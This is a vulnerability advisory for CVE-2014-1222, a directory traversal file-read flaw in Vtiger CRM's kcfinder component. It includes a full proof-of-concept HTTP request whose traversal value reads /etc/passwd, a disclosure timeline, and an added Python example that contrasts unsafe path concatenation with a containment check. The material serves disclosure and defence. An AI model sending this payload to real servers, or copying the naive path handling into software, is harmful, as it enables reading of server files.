CVE: CVE-2014-1222
Vendor: Vtiger
Product: CRM
Affected version: Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version: Vtiger 6.0.0 Security patch 1
Reported by: Jerzy Kramarz
Details:
A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.
The following request is a proof of concept for retrieving the /etc/passwd file from the remote system.
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off

dir=files&file=/../../../../../../../../../../../etc/passwd
Note: In order to exploit this vulnerability an attacker has to be authenticated.
Impact:
This vulnerability gives an attacker the ability to read local files from the server filesystem.
Exploit:
Exploit code is not required.
Vendor status:
23/12/2013 Advisory created
03/01/2014 Vendor contacted
14/01/2014 CVE obtained
27/01/2014 Vendor contact reattempted
10/02/2014 Vendor working on a fix
12/02/2014 Fix released
13/02/2014 Fix confirmed
11/03/2014 Published
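The path-containment check that rejects the `dir`/`file` values from the request in the Details section, shown beside the unsafe concatenation pattern. This is an added example, not kcfinder or vtiger code and not the vendor's patch; the function names, the upload-root layout and the sample bodies are assumptions made for illustration.

```python
import os
import tempfile
from urllib.parse import parse_qs

# Constructed sample: the POST body from the proof-of-concept request above.
POC_BODY = "dir=files&file=/../../../../../../../../../../../etc/passwd"


def naive_path(upload_root, body):
    """Unsafe pattern (hypothetical): append request fields to the upload root."""
    form = parse_qs(body)
    return os.path.normpath(upload_root + "/" + form["dir"][0] + "/" + form["file"][0])


def safe_path(upload_root, body):
    """Return the canonical path only if it stays inside upload_root, else None."""
    form = parse_qs(body, keep_blank_values=True)  # also decodes %2e%2e%2f forms
    directory = form.get("dir", [""])[0]
    filename = form.get("file", [""])[0]
    # A file name is one path component: no separators, no NUL, no dot entries.
    if filename in ("", ".", "..") or any(c in filename for c in "/\\\0"):
        return None
    root = os.path.realpath(upload_root)
    # realpath resolves ".." and symlinks before the containment test.
    candidate = os.path.realpath(os.path.join(root, directory.lstrip("/\\"), filename))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def demo():
    """Run both functions against a temporary upload root (constructed layout)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "upload")
        os.makedirs(os.path.join(root, "files"))
        poc_naive = naive_path(root, POC_BODY)
        return {
            "naive_escapes": not poc_naive.startswith(root + os.sep),
            "safe_poc": safe_path(root, POC_BODY),
            "safe_dir_traversal": safe_path(root, "dir=files/../../..&file=passwd"),
            "safe_legit": safe_path(root, "dir=files&file=report.pdf"),
            "expected_legit": os.path.join(os.path.realpath(root), "files", "report.pdf"),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The check has to cover both parameters: validating only `file` still lets a traversal sequence in `dir` leave the upload root, which is why the final comparison is made on the fully resolved path.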